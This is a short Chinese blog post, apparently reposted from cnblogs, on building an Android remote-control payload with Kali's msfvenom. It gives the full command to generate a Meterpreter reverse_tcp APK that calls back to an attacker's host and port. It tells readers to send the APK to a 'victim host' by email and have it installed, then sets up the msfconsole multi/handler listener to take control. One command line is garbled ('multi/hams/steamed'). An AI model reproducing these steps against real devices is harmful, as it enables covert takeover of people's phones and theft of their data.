码迷,mamicode.com
首页 > 其他好文 > 详细

kali payload程序制作

时间:2020-02-15 15:55:30      阅读:111      评论:0      收藏:0      [点我收藏+]

标签:生成   自动   set   msfvenom   com   handler   控制   roo   通过   

Metasploit中的payload分类下提供了大量的被控端程序,可以根据测试需求自动生成。

使用msfvenom -l payloads | more查看支持的控制端,如下图:

技术图片

kali 2019总共支持556种类,如上图所示,本例只演示andriod端。

 Step1:使用msfvenom命令生成控制端程序,如下图:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=8888 R> /root/ecs.apk

技术图片

  Step2:通过邮件或者文件发送将该文件复制到受害主机,并且安装

  Step3:在kali上使用msfconsole进入

 use exploit/multi/hams/steamed  use exploit/multi/handler

 msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.1.110

msf5 exploit(multi/handler) > set LPORT 8888

技术图片

  Step4:进行exploit

技术图片

 

kali payload程序制作

标签:生成   自动   set   msfvenom   com   handler   控制   roo   通过   

原文地址:https://www.cnblogs.com/networking/p/12311963.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!